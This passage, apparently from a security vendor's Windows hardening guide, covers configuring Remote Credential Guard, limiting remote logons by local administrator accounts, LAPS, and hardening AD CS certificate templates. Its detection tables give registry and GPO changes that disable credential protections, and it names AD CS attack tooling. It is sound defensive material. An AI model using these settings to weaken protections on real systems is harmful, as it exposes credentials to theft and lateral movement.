aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must be running at least Windows 10 (v1703) to be able to supply credentials</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must be running at least Windows 10 (v1607) or Windows Server 2016 to use the user's signed-in credentials (no prompt for credentials)</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User's account must be able to sign into both the client (origination) and the remote (destination) endpoint</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must be running the Remote Desktop Classic Windows application</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must use Kerberos authentication to connect to the remote host</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The Remote Desktop Universal Windows Platform application does not support Windows Defender Remote Credential Guard.</span></p> </li> </ul> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> If the client cannot connect to a domain controller, then RDP attempts to fall back to NTLM. Windows Defender Remote Credential Guard does not allow NTLM fallback because this would expose credentials to risk.</span></p> <p style="text-align: justify;"><span style="vertical-align: baseline;">The Remote Desktop remote (destination) host:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must be running at least Windows 10 (v1607) or Windows Server 2016</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must allow Restricted Admin connections</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must allow the client's domain user to access Remote Desktop connections</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Must allow delegation of nonexportable credentials</span></p> </li> </ul> <p><span style="vertical-align: baseline;">To enable Remote Credential Guard on the client (origination) host using a GPO configuration:</span></p> <ul> <li><em><span style="vertical-align: baseline;">Computer Configuration &gt; Administrative Templates &gt; System &gt; Credentials Delegation &gt; Restrict delegation of credentials to remote servers</span></em> <ul> <li><span style="vertical-align: baseline;">To require either Restricted Admin mode or Windows Defender Remote Credential Guard, choose <em>Prefer Windows Defender Remote Credential Guard</em>.</span> <ul> <li><span style="vertical-align: baseline;">In this configuration, Remote Credential Guard is preferred, but it will use <em>Restricted Admin mode</em> (if supported) when Remote Credential Guard cannot be used.</span></li> <li><span style="vertical-align: baseline;">Neither Remote Credential Guard nor Restricted Admin mode for RDP will send credentials in clear text to the Remote Desktop server.</span></li> </ul> </li> <li><span style="vertical-align: baseline;">To require Remote Credential Guard, choose <em>Require Windows Defender Remote Credential Guard</em>.</span> <ul> <li><span style="vertical-align: baseline;">In this configuration, a Remote Desktop connection will succeed only if the remote computer meets the requirements for Remote Credential Guard.</span></li> </ul> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">To enable Remote Credential Guard on the remote (destination) host, see Figure 49.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa Registry Entry: DisableRestrictedAdmin Value: 0 reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0 /t REG_DWORD</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 49: Registry key and command options to enable Remote Credential Guard on a remote (destination) host</span></p></div> <div class="block-paragraph_advanced"><p style="text-align: justify;"><span style="vertical-align: baseline;">To leverage Remote Credential Guard, use the command referenced in Figure 50.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>mstsc.exe /remoteguard</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 50: Command to leverage Remote Credential Guard</span></p></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Detection Opportunities for Windows Defender Remote Credential Guard</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Disable Remote Credential Guard</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1112/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1112 – Modify Registry</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for an account disabling Remote Credential Guard in the Windows Registry.<br/><br/></span></p> <pre class="language-plain"><code>HKLM\System\CurrentControlSet\Control\Lsa Registry Entry: DisableRestrictedAdmin Value: 1</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 51: Remote Credential Guard being disabled in the Windows Registry on a destination endpoint</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Disable Require Remote Credential Guard</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1484/001/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1484.001 – Domain Policy Modification: Group Policy Modification</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for the </span><span style="font-style: italic; vertical-align: baseline;">Require Remote Credential Guard</span><span style="vertical-align: baseline;"> option being disabled within a GPO configuration.<br/> </span></p> <pre class="language-plain"><code>Computer Configuration &gt; Administrative Templates &gt; System &gt; Credentials Delegation &gt; Restrict delegation of credentials to remote servers</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 52: Remote Credential Guard being disabled in a GPO</span></p> </td> </tr> </tbody> </table></div></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 28: Detection opportunities for Windows Defender Remote Credential Guard</span></div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Restrict Remote Usage of Local Accounts</span></h4> <p><span style="vertical-align: baseline;">Local accounts that exist on endpoints are often a common avenue leveraged by threat actors to laterally move throughout an environment. This tactic is especially impactful when the password for the built-in local administrator account is configured to the same value across multiple endpoints.</span></p> <p><span style="vertical-align: baseline;">To mitigate the impact of local accounts being leveraged for lateral movement, organizations should consider both limiting the ability of local administrator accounts to establish remote connections and creating unique and randomized passwords for local administrator accounts across the environment.</span></p> <p><a href="https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a" rel="noopener" target="_blank"><span style="vertical-align: baseline;">KB2871997</span></a><span style="vertical-align: baseline;"> introduced two well-known SIDs that can be leveraged within GPO settings to restrict the use of local accounts for lateral movement.</span></p> <ul> <li role="presentation"><code style="vertical-align: baseline;">S-1-5-113: NT AUTHORITY\Local account</code></li> <li role="presentation"><code style="vertical-align: baseline;">S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code></li> </ul> <p><span style="vertical-align: baseline;">Specifically, the SID </span><code style="vertical-align: baseline;">S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span style="vertical-align: baseline;"> is added to an account's access token if the local account is a member of the </span><code style="vertical-align: baseline;">BUILTIN\Administrators</code><span style="vertical-align: baseline;"> group. </span><strong style="vertical-align: baseline;">This is the most beneficial SID to leverage to help stop a threat actor (or ransomware variant) that propagates using credentials for any local administrative accounts.</strong></p> <p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">For SID </span><code style="vertical-align: baseline;">S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span style="vertical-align: baseline;">, if Failover Clustering is used, this feature should leverage a nonadministrative local account (</span><code style="vertical-align: baseline;">CLIUSR</code><span style="vertical-align: baseline;">) for cluster node management. </span><strong style="vertical-align: baseline;">If this account is a member of the local Administrators group on an endpoint that is part of a cluster, blocking the network logon permissions can cause cluster services to fail.</strong><span style="vertical-align: baseline;"> Be cautious and thoroughly test this configuration on servers where Failover Clustering is used.</span></p> <h4><span style="vertical-align: baseline;">Step 1 – Option 1: S-1-5-114 SID</span></h4> <p><span style="vertical-align: baseline;">To mitigate the use of local administrative accounts from being used for lateral movement, use the </span><code style="vertical-align: baseline;">SID S-1-5-114: NT AUTHORITY\Local account and member of Administrators group</code><span style="vertical-align: baseline;"> within the following settings:</span></p> <ul> <li><em><span style="vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment</span></em> <ul> <li><span style="vertical-align: baseline;">Deny access to this computer from the network (<code>SeDenyNetworkLogonRight</code>)</span></li> <li><span style="vertical-align: baseline;">Deny logon as a batch job (<code>SeDenyBatchLogonRight</code>)</span></li> <li><span style="vertical-align: baseline;">Deny logon as a service (<code>SeDenyServiceLogonRight</code>)</span></li> <li><span style="vertical-align: baseline;">Deny logon through Terminal Services (<code>SeDenyRemoteInteractiveLogonRight</code>)</span></li> <li><span style="vertical-align: baseline;">Debug programs (<code>SeDebugPrivilege</code>: Permission used for attempted privilege escalation and process injection)</span></li> </ul> </li> </ul> <h4><span style="vertical-align: baseline;">Step 1 – Option 2: UAC Token-Filtering</span></h4> <p><span style="vertical-align: baseline;">An additional control that can be enforced via GPO settings pertains to the usage of local accounts for remote administration and connectivity during a network logon. If the full scope of permissions (referenced previously) cannot be implemented in a short timeframe, consider applying the User Account Control (UAC) token-filtering method to local accounts for network-based logons. </span></p> <p><span style="vertical-align: baseline;">To leverage this configuration via a GPO setting:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Download the Security Compliance Toolkit (</span><a href="https://www.microsoft.com/en-us/download/details.aspx?id=55319" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">https://www.microsoft.com/en-us/download/details.aspx?id=55319</span></a><span style="vertical-align: baseline;">) to use the MS Security Guide </span><code style="vertical-align: baseline;">ADMX</code><span style="vertical-align: baseline;"> file. </span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Once downloaded, the </span><code style="vertical-align: baseline;">SecGuide.admx</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">SecGuide.adml</code><span style="vertical-align: baseline;"> files must be copied to the </span><code style="vertical-align: baseline;">\Windows\PolicyDefinitions</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">\Windows\PolicyDefinitions\en-US directories</code><span style="vertical-align: baseline;"> respectively.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">If a centralized GPO store is configured for the domain, copy the </span><code style="vertical-align: baseline;">PolicyDefinitions</code><span style="vertical-align: baseline;"> folder to the </span><code style="vertical-align: baseline;">C:\Windows\SYSVOL\sysvol\&lt;domain&gt;\Policies</code><span style="vertical-align: baseline;"> folder.</span></p> </li> </ol> <h5><span style="vertical-align: baseline;">GPO Setting</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MS Security Guide &gt; Apply UAC restrictions to local accounts on network logons</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"><span style="font-style: italic; vertical-align: baseline;">Enabled</span></li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">Once enabled, the registry value (Figure 53) will be configured on each endpoint.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy REG_DWORD = "0" (Enabled)</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 53: Registry key and value for enabling UAC restrictions for local accounts</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">When set to </span><code style="vertical-align: baseline;">0</code><span style="vertical-align: baseline;">, remote connections with high-integrity access tokens are only possible using either the plain-text credential or password hash of the RID 500 local administrator (and only then depending on the setting of </span><code style="vertical-align: baseline;">FilterAdministratorToken</code><span style="vertical-align: baseline;">, which is configurable via the GPO setting of </span><span style="font-style: italic; vertical-align: baseline;">User Account Control: Admin Approval Mode for the built-in Administrator account</span><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">The </span><code style="vertical-align: baseline;">FilterAdministratorToken</code><span style="vertical-align: baseline;"> option can either enable (1) or disable (0) (default) </span><span style="font-style: italic; vertical-align: baseline;">Admin Approval</span><span style="vertical-align: baseline;"> mode for the RID 500 local administrator. When enabled, the access token for the RID 500 local administrator account is filtered and therefore UAC is enforced for this account (which can ultimately stop attempts to leverage this account for lateral movement across endpoints).</span></p> <h5><span style="vertical-align: baseline;">GPO Setting</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options &gt; User Account Control: Admin Approval Mode for the built-in Administrator account</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Once enabled, the registry value (Figure 54) will be configured on each endpoint.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken REG_DWORD = "1" (Enabled)</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 54: Registry key and value for requiring Admin Approval Mode for local administrative accounts</span></p></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">Note:</strong><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">It is also prudent to ensure that the default setting for </span><span style="font-style: italic; vertical-align: baseline;">User Account Control: Run all administrators in Admin Approval Mode</span><span style="vertical-align: baseline;"> (</span><code style="vertical-align: baseline;">EnableLUA</code><span style="vertical-align: baseline;"> option) </span><strong style="vertical-align: baseline;">is not changed</strong><span style="vertical-align: baseline;"> from </span><span style="font-style: italic; vertical-align: baseline;">Enabled</span><span style="vertical-align: baseline;"> (default, as shown in Figure 55) to </span><span style="font-style: italic; vertical-align: baseline;">Disabled</span><span style="vertical-align: baseline;">. If this setting is disabled, </span><strong style="vertical-align: baseline;">all UAC policies are also disabled</strong><span style="vertical-align: baseline;">. With this setting disabled, it is possible to perform privileged remote authentication using plain-text credentials or password hashes with any local account that is a member of the local Administrators group.</span></p> <h5><span style="vertical-align: baseline;">GPO Setting</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Computer Configuration &gt; Policies &gt; Administrative Templates &gt; MS Security Guide &gt; User Account Control: Run all administrators in Admin Approval Mode</span></p> <ul> <li aria-level="1" style="list-style-type: disc; font-style: italic; vertical-align: baseline;"> <p role="presentation"><span style="font-style: italic; vertical-align: baseline;">Enabled</span></p> </li> </ul> </li> </ul> <p><span style="vertical-align: baseline;">Once enabled, the registry value (Figure 55) will be configured on each endpoint. This is the default setting.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA REG_DWORD = "1" (Enabled)</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 55: Registry key and value for requiring Admin Approval Mode for all local administrative accounts</span></p></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">UAC access token filtering will not affect any domain accounts in the local Administrators group on an endpoint.</strong></p> <h4><span style="vertical-align: baseline;">Step 2: LAPS</span></h4> <p><span style="vertical-align: baseline;">In addition to blocking the use of local administrator accounts from remote authentication to access endpoints, an organization should align a strategy to enforce password randomization for the built-in local administrator account. For many organizations, the easiest way to accomplish this task is by deploying and leveraging Microsoft's Local Administrator Password Solutions (LAPS).</span></p> <p><span style="vertical-align: baseline;">Additional information regarding <a href="https://www.microsoft.com/en-us/download/details.aspx?id=46899" rel="noopener" target="_blank">LAPS</a>, and <a href="https://learn.microsoft.com/en-us/entra/identity/devices/howto-manage-local-admin-passwords" target="_blank">here too</a>.</span></p> <h4><span style="vertical-align: baseline;">Detection Opportunities for Local Accounts</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Use Case</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MITRE ID</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Attempted Remote Logon of Local Account</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><a href="https://attack.mitre.org/techniques/T1078/003/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">T1078.003 - Valid Accounts: Local Accounts</span></a></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Search for remote logon attempts for local accounts on an endpoint.</span></p> </td> </tr> </tbody> </table></div></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 29: Detection opportunities for local accounts</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Active Directory Certificate Services (AD CS) Protections</span></h4> <p><span style="vertical-align: baseline;">Active Directory Certificate Services (AD CS) is Microsoft's implementation of Public Key Infrastructure (PKI) and integrates directly with Active Directory forests and domains. It can be utilized for a variety of purposes, including digital signatures and user authentication. Certificate Templates are used in AD CS to issue certificates that have been preconfigured for particular tasks. They contain settings and rules that are applied to incoming certificate requests and provide instructions on how a valid certificate request is provided.</span></p> <p><span style="vertical-align: baseline;">In June of 2021, SpecterOps published a blog post named </span><a href="https://specterops.io/blog/2021/06/17/certified-pre-owned/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Certified Pre-Owned</span></a><span style="vertical-align: baseline;">, which details their research into possible attacks against AD CS. Since that publication, Mandiant has continued to observe both threat actors and red teamers enhance targeting of AD CS in support of post-compromise objectives. Mandiant's </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defend-ad-cs-threats/"><span style="text-decoration: underline; vertical-align: baseline;">blog post</span></a> <span style="vertical-align: baseline;">and </span><a href="https://services.google.com/fh/files/misc/active-directory-certificate-services-hardening-wp-en.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">hardening guide</span></a><span style="vertical-align: baseline;"> address the continued abuse scenarios and AD CS attack vectors identified through our frontline observations of recent security breaches.</span></p> <h4><span style="vertical-align: baseline;">Discover Vulnerable Certificate Templates</span></h4> <p><span style="vertical-align: baseline;">Certificate templates that have been configured and published by AD CS are stored in Active Directory as objects with an object class of </span><code style="vertical-align: baseline;">pKICertificateTemplate</code><span style="vertical-align: baseline;"> and can be discovered by blue teams as well as threat actors. Any account that is authenticated to Active Directory can query LDAP directly, with the built-in Windows command </span><code style="vertical-align: baseline;">certutil.exe</code><span style="vertical-align: baseline;">, or with specialized tools such as </span><a href="https://github.com/GhostPack/PSPKIAudit" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">PSPKIAudit</span></a><span style="vertical-align: baseline;">, </span><a href="https://github.com/ly4k/Certipy" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Certipy</span></a><span style="vertical-align: baseline;">, and </span><a href="https://github.com/GhostPack/Certify" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Certify</span></a><span style="vertical-align: baseline;">. Mandiant recommends using one of these methods to discover vulnerable certificate templates.</span></p> <h4><span style="vertical-align: baseline;">Harden Vulnerable Certificate Templates</span></h4> <p><span style="vertical-align: baseline;">Once discovered, vulnerable certificate templates should be hardened to prevent abuse.</span></p></div> <div class="block-paragraph_advanced"><ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ensure that all domain controllers and Certificate Authority servers are patched with the latest updates and hotfixes.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">After installing Windows update (</span><a href="https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">KB5014754</span></a><span style="vertical-align: baseline;">) and monitoring/remediating for Event IDs 39 and 41, configure Active Directory to support full enforcement mode to reject authentications based on weaker mappings in certificates.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Using one of the aforementioned methods, regularly review published certificate templates, specifically for any settings related to SAN specifications configured in existing templates.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Review the security permissions assigned to all published certificate templates and validate the scope of enrollment and write permissions are delegated to the correct security principals.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Review published templates configured with the following Enhanced Key Usages (EKUs) that support domain authentication and verify the operational requirement for these configurations.</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Any Purpose (2.5.29.37.0)</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Subordinate CA 